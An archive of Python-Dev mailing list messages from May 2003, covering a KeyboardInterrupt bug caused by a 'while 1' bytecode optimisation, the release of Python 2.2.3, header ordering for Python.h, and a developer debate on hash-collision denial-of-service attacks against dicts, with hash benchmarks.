> I find that
>
>        while 1: pass
>
> doesn't respond to a KeyboardInterrupt on Python2.3b1 on either
> WinXP or W2K.  Is this generally known?  I couldn't find any mention
> of it.
>
>       while 1: a = 0
>
> is fine on 2.3b1, and both work on Python2.2.
>
> - --
> KBK
>
> ------- End of Forwarded Message



From neal@metaslash.com  Fri May 30 21:40:01 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Fri, 30 May 2003 16:40:01 -0400
Subject: [Python-Dev] KeyboardInterrupt on Windows
In-Reply-To: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net>
References: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030530204000.GH27502@epoch.metaslash.com>

On Fri, May 30, 2003 at 04:35:53PM -0400, Guido van Rossum wrote:
> I received this problem report (Kurt is the IDLEFORK developer).  Does
> anybody know what could be the matter here?  What changed recently???

>        while 1: pass
> 
> doesn't respond to a KeyboardInterrupt on Python2.3b1 on either
> WinXP or W2K.

Could this be from the optimization Raymond did:

>>> def f():
...  while 1: pass


>>> dis.dis(f)
  2           0 SETUP_LOOP              12 (to 15)
              3 JUMP_FORWARD             4 (to 10)
              6 JUMP_IF_FALSE            4 (to 13)
              9 POP_TOP
        >>   10 JUMP_ABSOLUTE           10
        >>   13 POP_TOP
             14 POP_BLOCK
        >>   15 LOAD_CONST               0 (None)
             18 RETURN_VALUE

3 jumps to 10, 10 jumps to itself unless I'm reading this wrong.

See Python/compile.c::optimize_code (starting around line 339)

Neal


From jeremy@zope.com  Fri May 30 21:43:28 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 30 May 2003 16:43:28 -0400
Subject: [Python-Dev] KeyboardInterrupt on Windows
In-Reply-To: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net>
References: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1054327408.2917.9.camel@slothrop.zope.com>

It's probably an unintended consequence of the "while 1" optimization
and the fast-next-opcode optimization.  "while 1" doesn't do a test at
runtime anymore.  And opcodes like JUMP_ABSOLUTE bypass the test for
pending exceptions.  The next result is that while 1: pass puts the
interpreter in a tight loop doing a JUMP_ABSOLUTE that goes nowhere. 
That is offset X has JUMP_ABSOLUTE X.

I'd be inclined to call this a bug, but I'm not sure how to fix it.

Jeremy




From neal@metaslash.com  Fri May 30 22:04:30 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Fri, 30 May 2003 17:04:30 -0400
Subject: [Python-Dev] KeyboardInterrupt on Windows
In-Reply-To: <20030530204000.GH27502@epoch.metaslash.com>
References: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net>
 <20030530204000.GH27502@epoch.metaslash.com>
Message-ID: <20030530210430.GI27502@epoch.metaslash.com>

On Fri, May 30, 2003 at 04:40:00PM -0400, Neal Norwitz wrote:
> On Fri, May 30, 2003 at 04:35:53PM -0400, Guido van Rossum wrote:
> > I received this problem report (Kurt is the IDLEFORK developer).  Does
> > anybody know what could be the matter here?  What changed recently???
> 
> >        while 1: pass
> > 
> > doesn't respond to a KeyboardInterrupt on Python2.3b1 on either
> > WinXP or W2K.

The patch below fixes the problem by not optimizing while 1:pass.  
Seems kinda hacky though.

Neal
--

Index: Python/compile.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Python/compile.c,v
retrieving revision 2.289
diff -w -u -r2.289 compile.c
--- Python/compile.c    22 May 2003 22:00:04 -0000      2.289
+++ Python/compile.c    30 May 2003 21:02:26 -0000
@@ -411,6 +411,8 @@
                                tgttgt -= i + 3;     /* Calc relative jump addr
*/
                        if (tgttgt < 0)           /* No backward relative jumps
*/
                                 continue;
+                       if (i == tgttgt && opcode == JUMP_ABSOLUTE)
+                               goto exitUnchanged;
                        codestr[i] = opcode;
                        SETARG(codestr, i, tgttgt);
                        break;


From barry@python.org  Fri May 30 22:09:27 2003
From: barry@python.org (Barry Warsaw)
Date: 30 May 2003 17:09:27 -0400
Subject: [Python-Dev] I'm tagging the Python 2.2.3 tree
Message-ID: <1054328967.13804.33.camel@geddy>

No more changes please.
-Barry




From mwh@python.net  Fri May 30 22:22:32 2003
From: mwh@python.net (Michael Hudson)
Date: Fri, 30 May 2003 22:22:32 +0100
Subject: [Python-Dev] KeyboardInterrupt on Windows
In-Reply-To: <1054327408.2917.9.camel@slothrop.zope.com> (Jeremy Hylton's
 message of "30 May 2003 16:43:28 -0400")
References: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net>
 <1054327408.2917.9.camel@slothrop.zope.com>
Message-ID: <2mvfvsf7tz.fsf@starship.python.net>

Jeremy Hylton <jeremy@zope.com> writes:

> It's probably an unintended consequence of the "while 1" optimization
> and the fast-next-opcode optimization.  "while 1" doesn't do a test at
> runtime anymore.  And opcodes like JUMP_ABSOLUTE bypass the test for
> pending exceptions.  The next result is that while 1: pass puts the
> interpreter in a tight loop doing a JUMP_ABSOLUTE that goes nowhere. 
> That is offset X has JUMP_ABSOLUTE X.
>
> I'd be inclined to call this a bug, but I'm not sure how to fix it.

Take out the while 1: optimizations?  I don't want to belittle
Raymond's efforts, but I am conscious of[1] Tim's repeated
observations of the correlation between the number of optimizations in
the compiler and the number of weird bugs therein.

Cheers,
M.

[1] I'm also warming up for a end-of-PyPy-sprint drunken hacking
    session so you probably shouldn't take me too seriously :-)

-- 
  ARTHUR:  Why should a rock hum?
    FORD:  Maybe it feels good about being a rock.
                    -- The Hitch-Hikers Guide to the Galaxy, Episode 8


From python@rcn.com  Fri May 30 22:23:47 2003
From: python@rcn.com (Raymond Hettinger)
Date: Fri, 30 May 2003 17:23:47 -0400
Subject: [Python-Dev] KeyboardInterrupt on Windows
References: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net> <20030530204000.GH27502@epoch.metaslash.com> <20030530210430.GI27502@epoch.metaslash.com>
Message-ID: <004401c326f1$c2391300$125ffea9@oemcomputer>

> On Fri, May 30, 2003 at 04:40:00PM -0400, Neal Norwitz wrote:
> > On Fri, May 30, 2003 at 04:35:53PM -0400, Guido van Rossum wrote:
> > > I received this problem report (Kurt is the IDLEFORK developer).  Does
> > > anybody know what could be the matter here?  What changed recently???
> > 
> > >        while 1: pass
> > > 
> > > doesn't respond to a KeyboardInterrupt on Python2.3b1 on either
> > > WinXP or W2K.
> 
> The patch below fixes the problem by not optimizing while 1:pass.  

That looks like a good fix to me. 

There are two other ways:
*   disable the goto fast_next_opcode for JUMP_ABSOLUTE
*   disable the byte optimization for a jump-to-a-jump


Raymond


From scrosby@cs.rice.edu  Fri May 30 23:02:51 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 30 May 2003 17:02:51 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <20030530200021.GB30507@unpythonic.net>
References: <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net>
 <oydisrtyy42.fsf@bert.cs.rice.edu>
 <200305301139.h4UBdIb15112@pcp02138704pcs.reston01.va.comcast.net>
 <oyd4r3cl86x.fsf@bert.cs.rice.edu>
 <20030530200021.GB30507@unpythonic.net>
Message-ID: <oydwug814ac.fsf@bert.cs.rice.edu>

On Fri, 30 May 2003 15:00:21 -0500, Jeff Epler <jepler@unpythonic.net> writes:

> On Fri, May 30, 2003 at 11:18:14AM -0500, Scott A Crosby wrote:
> > On 
> > 
> >    http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003/LengthEffects.png
> > 
> > UHASH exceeds the performance of perl's hash function, which is
> > simpler than your own.
> 
> I notice that you say "with strings longer than around 44-bytes,
> UHASH dominates all the other hash functions, due in no small part to its
> extensive performance tuning and *hand-coded assembly routines.*"
> [emphasis mine]  It's all well and good for people who can run your

We benchmarked it, and without assembly optimizations, uhash still
exceeds perl. Also please note that we did not create uhash. We merely
used it as a high performance universal hash which we could cite and
benchmark.

Freshly computed raw benchmarks on a P2-450 are at the end of this
email. Looking at them now. I think we may have slightly err'ed and
used the non-assembly version of the hash in constructing the graphs,
because the crossover point compared to perl looks to be about 20
bytes with assembly, and about 48 without.

Roughly, they show that uhash is about half the speed on a P2-450
without assembly. I do not have benchmarks on other platforms to
compare it to. However, CW is known be about 10 times worse,
relatively, than jenkin's on a SPARC.

The python community will have to judge whether the performance
difference of the current hash is worth the risk of the attack.

Also, I'd like to thank Tim Peters for telling me about the potential
of degradation that regular expressions may offer.

Scott



Time benchmarking actual hash (including benchmarking overhead) with a
working set size of 12kb.

Time(perl-5.8.0): 12.787 Mbytes/sec with string length 4, buf 12000
Time(uh_cw-1024): 6.010 Mbytes/sec with string length 4, buf 12000
Time(python): 14.952 Mbytes/sec with string length 4, buf 12000
Time(test32out_uhash): 4.584 Mbytes/sec with string length 4, buf 12000
Time(test32out_assembly_uhash): 6.014 Mbytes/sec with string length 4, buf 12000

Time(perl-5.8.0): 29.125 Mbytes/sec with string length 16, buf 12000
Time(uh_cw-1024): 11.898 Mbytes/sec with string length 16, buf 12000
Time(python): 36.445 Mbytes/sec with string length 16, buf 12000
Time(test32out_uhash): 19.169 Mbytes/sec with string length 16, buf 12000
Time(test32out_assembly_uhash): 25.660 Mbytes/sec with string length 16, buf 12000

Time(perl-5.8.0): 45.440 Mbytes/sec with string length 64, buf 12000
Time(uh_cw-1024): 16.168 Mbytes/sec with string length 64, buf 12000
Time(python): 62.213 Mbytes/sec with string length 64, buf 12000
Time(test32out_uhash): 71.396 Mbytes/sec with string length 64, buf 12000
Time(test32out_assembly_uhash): 106.873 Mbytes/sec with string length 64, buf 12000

Time benchmarking actual hash (Including benchmarking overhead) with a
working set size of 6mb.

Time(perl-5.8.0): 8.099 Mbytes/sec with string length 4, buf 6000000
Time(uh_cw-1024): 4.660 Mbytes/sec with string length 4, buf 6000000
Time(python): 8.840 Mbytes/sec with string length 4, buf 6000000
Time(test32out_uhash): 3.932 Mbytes/sec with string length 4, buf 6000000
Time(test32out_assembly_uhash): 4.859 Mbytes/sec with string length 4, buf 6000000

Time(perl-5.8.0): 20.878 Mbytes/sec with string length 16, buf 6000000
Time(uh_cw-1024): 9.964 Mbytes/sec with string length 16, buf 6000000
Time(python): 24.450 Mbytes/sec with string length 16, buf 6000000
Time(test32out_uhash): 16.168 Mbytes/sec with string length 16, buf 6000000
Time(test32out_assembly_uhash): 19.929 Mbytes/sec with string length 16, buf 6000000

Time(perl-5.8.0): 35.265 Mbytes/sec with string length 64, buf 6000000
Time(uh_cw-1024): 14.400 Mbytes/sec with string length 64, buf 6000000
Time(python): 46.650 Mbytes/sec with string length 64, buf 6000000
Time(test32out_uhash): 48.719 Mbytes/sec with string length 64, buf 6000000
Time(test32out_assembly_uhash): 63.523 Mbytes/sec with string length 64, buf 6000000



From nas@python.ca  Fri May 30 23:22:04 2003
From: nas@python.ca (Neil Schemenauer)
Date: Fri, 30 May 2003 15:22:04 -0700
Subject: [Python-Dev] KeyboardInterrupt on Windows
In-Reply-To: <1054327408.2917.9.camel@slothrop.zope.com>
References: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net> <1054327408.2917.9.camel@slothrop.zope.com>
Message-ID: <20030530222204.GB404@glacier.arctrix.com>

Jeremy Hylton wrote:
> I'd be inclined to call this a bug, but I'm not sure how to fix it.

I think right the fix it to make JUMP_ABSOLUTE not bypass the test for
pending exceptions.  We have to be really careful with using
fast_next_opcode.  Originally it was only used by SET_LINENO, LOAD_FAST,
LOAD_CONST, STORE_FAST, POP_TOP.  Using it from jump opcodes is asking
for trouble, IMHO.

Shall I prepare a patch?

  Neil


From python@rcn.com  Fri May 30 23:29:50 2003
From: python@rcn.com (Raymond Hettinger)
Date: Fri, 30 May 2003 18:29:50 -0400
Subject: [Python-Dev] KeyboardInterrupt on Windows
References: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net> <20030530204000.GH27502@epoch.metaslash.com> <20030530210430.GI27502@epoch.metaslash.com>
Message-ID: <009501c326fa$fc8bb680$125ffea9@oemcomputer>

> The patch below fixes the problem by not optimizing while 1:pass.  
> Seems kinda hacky though.
> 
> Neal

My version of the patch and a testcase is on SF at:
www.python.org/sf/746376  if anyone wants to take
a look.

While we're focused on the compiler, there is a
nasty one still outstanding that relates to the
fast_function() optimation:
www.python.org/sf/733667


Raymond Hettinger



From python@rcn.com  Fri May 30 23:47:47 2003
From: python@rcn.com (Raymond Hettinger)
Date: Fri, 30 May 2003 18:47:47 -0400
Subject: [Python-Dev] KeyboardInterrupt on Windows
References: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net> <1054327408.2917.9.camel@slothrop.zope.com> <20030530222204.GB404@glacier.arctrix.com>
Message-ID: <00ab01c326fd$7e584000$125ffea9@oemcomputer>

[Neil S]
> I think right the fix it to make JUMP_ABSOLUTE not bypass the test for
> pending exceptions.  

Yes.  That's the correct fix because it handles all cases including:

     while 1:
        x=1      

Please go ahead and patch it up.


Raymond


From tim.one@comcast.net  Sat May 31 00:07:38 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 30 May 2003 19:07:38 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oyd4r3cl86x.fsf@bert.cs.rice.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEEGEIAB.tim.one@comcast.net>

[Scott Crosby]
> ...
> Have you done benchmarking to prove that string_hash is in fact an
> important hotspot in the python interpreter?

It depends on the specific application, of course.  The overall speed of
dicts is crucial, but in many "namespace" dict apps the strings are
interned, implying (among other things) that a hash code is computed only
once per string.  In those apps the speed of the string hash function isn't
so important.  Overall, though, I'd welcome a faster string hash, and I
agree that Python's isn't particularly zippy.

OTOH, it's just a couple lines of C that run fine on everything from Palm
Pilots to Crays, and have created no portability or maintenance headaches.
Browsing your site, you've got over 100KB of snaky C code to implement
hashing functions, some with known bugs, others with cautions about open
questions wrt platforms with different endianness and word sizes than the
code was initially tested on.  Compared to what Python is using now, that's
a maintenance nightmare.

Note that Python's hash API doesn't return 32 bits, it returns a hash code
of the same size as the native C long.  The multiplication gimmick doesn't
require any pain to do that.

Other points that arise in practical deployment:

+ Python dicts can be indexed by many kinds of immutable objects.
  Strings are just one kind of key, and Python has many hash functions.

+ If I understand what you're selling, the hash code of a given string
  will almost certainly change across program runs.  That's a very
  visible change in semantics, since hash() is a builtin Python
  function available to user code.  Some programs use hash codes to
  index into persistent (file- or database- based) data structures, and
  such code would plain break if the hash code of a string changed
  from one run to the next.  I expect the user-visible hash() would have
  to continue using a predictable function.

+ Some Python apps run for months, and universal hashing doesn't remove
  the possibility of quadratic-time behavior.  If I can poke at a
  long-running app and observe its behavior, over time I can deduce a
  set of keys that collide badly for any hashing scheme fixed when
  the program starts.  In that sense I don't believe this gimmick
  wholly plugs the hole it's trying to plug.

> If so, and doing one modulo operation per string is unacceptable,

If it's mod by a prime, probably.  Some architectures Python runs on require
hundreds of cycles to do an integer mod, and we don't have the resources to
construct custom mod-by-an-int shortcut code for dozens of obscure
architectures.

> then you may wish to consider Jenkin's hash. The linux kernel people
> are switching to using a keyed veriant of Jenkin's hash. However,
> Jenkin's, AFAIK, has no proofs that it is in fact universal. It,
> however, probably is safe.

Nobody writing a Python program *has* to use a dict.  That dicts have
quadratic-time worst-case behavior isn't hidden, and there's no cure for
that short of switching to a data structure with better worst-case bounds.
I certainly agree it's something for programmers to be aware of.  I still
don't see any reason for the core language to care about this, though.



From scrosby@cs.rice.edu  Sat May 31 00:56:51 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 30 May 2003 18:56:51 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEGEIAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCAEEGEIAB.tim.one@comcast.net>
Message-ID: <oydznl4yon0.fsf@bert.cs.rice.edu>

On Fri, 30 May 2003 19:07:38 -0400, Tim Peters <tim.one@comcast.net> writes:

> [Scott Crosby]
> > ...
> > Have you done benchmarking to prove that string_hash is in fact an
> > important hotspot in the python interpreter?
> 
> It depends on the specific application, of course.  The overall speed of
> dicts is crucial, but in many "namespace" dict apps the strings are
> interned, implying (among other things) that a hash code is computed only
> once per string.  In those apps the speed of the string hash function isn't
> so important.  Overall, though, I'd welcome a faster string hash, and I
> agree that Python's isn't particularly zippy.

Actually, at least on x86, it is faster than perl. On other platforms,
it may be somewhat slower.

> OTOH, it's just a couple lines of C that run fine on everything from Palm
> Pilots to Crays, and have created no portability or maintenance headaches.
> Browsing your site, you've got over 100KB of snaky C code to implement
> hashing functions, some with known bugs, others with cautions about open
> questions wrt platforms with different endianness and word sizes than the
> code was initially tested on.  Compared to what Python is using now, that's
> a maintenance nightmare.

Yes, I am aware of the problems with the UHASH code. Unfortunately, I
am not a hash function designer, that code is not mine, and I only use
it as a black box.

I also consider all code, until verified otherwise, to potentially
suffer from endianness, alignment, and 32/64 bit issues. Excluding
alignment issues (which I'm not sure whether to say that its OK to
fail on strange alignments or not) it has passed *my* self-tests on
big endian and 64 bit.

> + Python dicts can be indexed by many kinds of immutable objects.
>   Strings are just one kind of key, and Python has many hash functions.
> 
> + If I understand what you're selling, the hash code of a given string
>   will almost certainly change across program runs.  That's a very
>   visible change in semantics, since hash() is a builtin Python
>   function available to user code.  Some programs use hash codes to
>   index into persistent (file- or database- based) data structures, and
>   such code would plain break if the hash code of a string changed
>   from one run to the next.  I expect the user-visible hash() would have
>   to continue using a predictable function.

The hash has to be keyed upon something. It is possible to store the
key in a file and reuse the same one across all runs. However,
depending on the universal hash function used, leaking pairs of
(input,hash(input)) may allow an attacker to determine the secret key,
and allow attack again. But yeah, preserving these semantics becomes
very messy. The hash-key becomes part of the system state that must be
migrated along with other data that depends on it.

> + Some Python apps run for months, and universal hashing doesn't remove
>   the possibility of quadratic-time behavior.  If I can poke at a
>   long-running app and observe its behavior, over time I can deduce a

I argued on linux-kernel with someone else that this was extremely
unlikely. It requires the latency of a collision/non-collision being
noticable over a noisy system, network stack, and system. In almost
all cases, for short inputs, the cost of a single L2 cache miss far
exceeds that of hashing.

A more serious danger is an application that leaks actual hash values.

> If it's mod by a prime, probably.

I'd benchmark it in practice, microbenchmarking on a sparc says that
it is rather expensive. However, on an X86, the cost of an L2 cache
miss exceeds the cost of hashing a small string. You'd have a better
idea what impact this might have on the total runtime of the system in
the worst case.

> > then you may wish to consider Jenkin's hash. The linux kernel people
> > are switching to using a keyed veriant of Jenkin's hash. However,
> > Jenkin's, AFAIK, has no proofs that it is in fact universal. It,
> > however, probably is safe.
> 
> Nobody writing a Python program *has* to use a dict.  That dicts have
> quadratic-time worst-case behavior isn't hidden, and there's no cure for

Agreed, many have realized over the years that hash tables can have
quadratic behavior in an adversarial environment. It isn't
hidden. Cormen, Lieserson, and Rivest even warn about this in their
seminal algorithms textbook in 1991. It *is* obvious when thought of,
but the reason I was able to ship out so many vulnerability reports
yesterday was because few actually *have* thought of that
deterministic worst-case when writing their programs. I predict this
trend to continue.

I like hash tables a lot, with UH, their time bounds are randomized,
but are pretty tight and the constant factors far exceed those of
balanced binary trees.

Scott


From guido@python.org  Sat May 31 01:41:54 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 30 May 2003 20:41:54 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: "Your message of Fri, 30 May 2003 19:07:38 EDT."
 <LNBBLJKPBEHFEDALKOLCAEEGEIAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCAEEGEIAB.tim.one@comcast.net>
Message-ID: <200305310041.h4V0fsF20796@pcp02138704pcs.reston01.va.comcast.net>

> + If I understand what you're selling, the hash code of a given string
>   will almost certainly change across program runs.  That's a very
>   visible change in semantics, since hash() is a builtin Python
>   function available to user code.  Some programs use hash codes to
>   index into persistent (file- or database- based) data structures, and
>   such code would plain break if the hash code of a string changed
>   from one run to the next.  I expect the user-visible hash() would have
>   to continue using a predictable function.

Of course, such programs are already vulnerable to changes in the hash
implementation between Python versions (which has happened before).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry@python.org  Sat May 31 04:11:45 2003
From: barry@python.org (Barry Warsaw)
Date: 30 May 2003 23:11:45 -0400
Subject: [Python-Dev] RELEASED Python 2.2.3 (final)
Message-ID: <1054350704.14645.16.camel@geddy>

I'm happy to announce the release of Python 2.2.3 (final).  This is a
bug fix release for the stable Python 2.2 code line.  It contains more
than 40 bug fixes and memory leak patches since Python 2.2.2, and all
Python 2.2 users are encouraged to upgrade.

The new release is available here:

        http://www.python.org/2.2.3/

For full details, see the release notes at

        http://www.python.org/2.2.3/NEWS.txt

There are a small number of minor incompatibilities with Python 2.2.2;
for details see:

        http://www.python.org/2.2.3/bugs.html

Perhaps the most important is that the Bastion.py and rexec.py modules
have been disabled, since we do not deem them to be safe.

As usual, a Windows installer and a Unix/Linux source tarball are made
available.  The documentation has been updated as well, and is available
both on-line and in many different formats. At the moment, no Mac
version or Linux RPMs are available, although I expect them to appear
soon.

On behalf of Guido, I'd like to thank everyone who contributed to this 
release, and who continue to ensure Python's success.

Enjoy,
-Barry




From jepler@unpythonic.net  Sat May 31 14:05:06 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Sat, 31 May 2003 08:05:06 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <200305310041.h4V0fsF20796@pcp02138704pcs.reston01.va.comcast.net>
References: <LNBBLJKPBEHFEDALKOLCAEEGEIAB.tim.one@comcast.net> <200305310041.h4V0fsF20796@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030531130503.GA16185@unpythonic.net>

On Fri, May 30, 2003 at 08:41:54PM -0400, Guido van Rossum wrote:
> Of course, such programs are already vulnerable to changes in the hash
> implementation between Python versions (which has happened before).

Is there at least a guarantee that the hashing algorithm won't change in a
bugfix release?  For instance, can I depend that
	python222 -c 'print hash(1), hash("a")'
	python223 -c 'print hash(1), hash("a")'
will both output the same thing, even if
	python23 -c 'print hash(1), hash("a")'
and
	python3000 -c 'print hash(1), hash("a")'
may print something different?

Jeff


From pje@telecommunity.com  Sat May 31 14:17:16 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Sat, 31 May 2003 09:17:16 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oydwug814ac.fsf@bert.cs.rice.edu>
References: <20030530200021.GB30507@unpythonic.net>
 <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net>
 <oydisrtyy42.fsf@bert.cs.rice.edu>
 <200305301139.h4UBdIb15112@pcp02138704pcs.reston01.va.comcast.net>
 <oyd4r3cl86x.fsf@bert.cs.rice.edu>
 <20030530200021.GB30507@unpythonic.net>
Message-ID: <5.1.0.14.0.20030531090628.02567ad0@mail.telecommunity.com>

At 05:02 PM 5/30/03 -0500, Scott A Crosby wrote:

>The python community will have to judge whether the performance
>difference of the current hash is worth the risk of the attack.

Note that the "community" doesn't really have to judge.  An individual 
developer can, if they have an application they deem vulnerable, do 
something like this:

class SafeString(str):
     def __hash__(self):
         # code to return a hash code

safe = SafeString(string_from_untrusted_source)

and then use only these "safe" strings as keys for a given dictionary.  Or, 
with a little more work, they can subclass 'dict' and make a dictionary 
that converts its keys to "safe" strings.

As far as current vulnerability goes, I'd say that the most commonly 
available attack point for this would be CGI programs that accept POST 
operations.  A POST can supply an arbitrarily large number of form field keys.

If you can show that the Python 'cgi' module is vulnerable to such an 
attack, in a dramatic disproportion to the size of the data transmitted 
(since obviously it's as much of a DoS to flood a script with a large 
quantity of data), then it might be worth making changes to the 'cgi' 
module, or at least warning the developers of alternatives to CGI (e.g. 
Zope, Quixote, SkunkWeb, CherryPy, etc.) that alternate hashes might be a 
good idea.

But based on the discussion so far, I'm not sure I see how this attack 
would produce an effect that was dramatically disproportionate to the 
amount of data transmitted.



From dave@boost-consulting.com  Sat May 31 15:35:27 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sat, 31 May 2003 10:35:27 -0400
Subject: [Python-Dev] more-precise instructions for "Python.h first"?
Message-ID: <uvfvrrxow.fsf@boost-consulting.com>

Boost.Python is now trying hard to accomodate the "Python.h before
system headers rule".  Unfortunately, we still need a wrapper around
Python.h, at least for some versions of Python, so that we can
work around some issues like:

    //
    // Python's LongObject.h helpfully #defines ULONGLONG_MAX for us
    // even when it's not defined by the system which confuses Boost's
    // config
    //

To cope with that correctly, we need to see <limits.h> (a system
header) before longobject.h.  Currently, we're including <limits.h>,
then <patchlevel.h>, well, and then the wrapper gets a little
complicated adjusting for various compilers.

Anyway, the point is that I'd like to have the rule changed to "You
have to include Python.h or xxxx.h before any system header" where
xxxx.h is one of the other existing headers #included in Python.h that
is responsible for setting up whatever macros cause this
inclusion-order requirement in the first place (preferably not
LongObject.h!)  That way I might be able to get those configuration
issues sorted out without violating the #inclusion order rule.  What
I have now seems to work, but I'd rather do the right thing (TM).

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From scrosby@cs.rice.edu  Sat May 31 16:48:28 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 31 May 2003 10:48:28 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <5.1.0.14.0.20030531090628.02567ad0@mail.telecommunity.com>
References: <20030530200021.GB30507@unpythonic.net>
 <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net>
 <oydisrtyy42.fsf@bert.cs.rice.edu>
 <200305301139.h4UBdIb15112@pcp02138704pcs.reston01.va.comcast.net>
 <oyd4r3cl86x.fsf@bert.cs.rice.edu>
 <20030530200021.GB30507@unpythonic.net>
 <5.1.0.14.0.20030531090628.02567ad0@mail.telecommunity.com>
Message-ID: <oydwug7i0c3.fsf@bert.cs.rice.edu>

On Sat, 31 May 2003 09:17:16 -0400, "Phillip J. Eby" <pje@telecommunity.com> writes:

> At 05:02 PM 5/30/03 -0500, Scott A Crosby wrote:

> But based on the discussion so far, I'm not sure I see how this attack
> would produce an effect that was dramatically disproportionate to the
> amount of data transmitted.

I apologize for not having this available earlier, but a corrected
file of 10,000 inputs is now available and shows the behavior I
claimed. (Someone else independently reimplemented the attack and has
sent me a corrected set for python.) With 10,000 inputs, python
requires 19 seconds to process instead of .2 seconds. A file of half
the size requires 4 seconds, showing the quadratic behavior, as with
the case of perl. (Benchmarked on a P2-450) I thus predict that twice
the inputs would take about 80 seconds.

I can only guess what python applications might experience an
interesting impact from this, so I'll be silent. However, here are the
concrete benchmarks.

Scott


From martin@v.loewis.de  Sat May 31 17:28:25 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 31 May 2003 18:28:25 +0200
Subject: [Python-Dev] more-precise instructions for "Python.h first"?
In-Reply-To: <uvfvrrxow.fsf@boost-consulting.com>
References: <uvfvrrxow.fsf@boost-consulting.com>
Message-ID: <m34r3baxna.fsf@mira.informatik.hu-berlin.de>

David Abrahams <dave@boost-consulting.com> writes:

> Anyway, the point is that I'd like to have the rule changed to "You
> have to include Python.h or xxxx.h before any system header" where
> xxxx.h is one of the other existing headers #included in Python.h that
> is responsible for setting up whatever macros cause this
> inclusion-order requirement in the first place (preferably not
> LongObject.h!)

If I understand correctly, you want to follow the rule "I want to
change things as long it continues to work for me". For that, you
don't need any permission. If it works for you, you can ignore any
rules you feel uncomfortable with.

The rule is there for people who don't want to understand the specific
details of system configuration. If you manage to get a consistent
configuration in a different way, just go for it. You should make sure
then that your users can't run into problems, though.

Regards,
Martin



From guido@python.org  Sat May 31 17:55:21 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 31 May 2003 12:55:21 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: "Your message of Sat, 31 May 2003 08:05:06 CDT."
 <20030531130503.GA16185@unpythonic.net>
References: <LNBBLJKPBEHFEDALKOLCAEEGEIAB.tim.one@comcast.net>
 <200305310041.h4V0fsF20796@pcp02138704pcs.reston01.va.comcast.net>
 <20030531130503.GA16185@unpythonic.net>
Message-ID: <200305311655.h4VGtLk21998@pcp02138704pcs.reston01.va.comcast.net>

> On Fri, May 30, 2003 at 08:41:54PM -0400, Guido van Rossum wrote:
> > Of course, such programs are already vulnerable to changes in the hash
> > implementation between Python versions (which has happened before).
> 
> Is there at least a guarantee that the hashing algorithm won't change in a
> bugfix release?  For instance, can I depend that
> 	python222 -c 'print hash(1), hash("a")'
> 	python223 -c 'print hash(1), hash("a")'
> will both output the same thing, even if
> 	python23 -c 'print hash(1), hash("a")'
> and
> 	python3000 -c 'print hash(1), hash("a")'
> may print something different?

That's a reasonable assumption, yes.  We realize that changing the
hash algorithm is a feature change, even if it is a very subtle one.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jepler@unpythonic.net  Sat May 31 18:42:17 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Sat, 31 May 2003 12:42:17 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oydwug7i0c3.fsf@bert.cs.rice.edu>
References: <20030530200021.GB30507@unpythonic.net> <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net> <oydisrtyy42.fsf@bert.cs.rice.edu> <200305301139.h4UBdIb15112@pcp02138704pcs.reston01.va.comcast.net> <oyd4r3cl86x.fsf@bert.cs.rice.edu> <20030530200021.GB30507@unpythonic.net> <5.1.0.14.0.20030531090628.02567ad0@mail.telecommunity.com> <oydwug7i0c3.fsf@bert.cs.rice.edu>
Message-ID: <20030531174214.GA18222@unpythonic.net>

On Sat, May 31, 2003 at 10:48:28AM -0500, Scott A Crosby wrote:
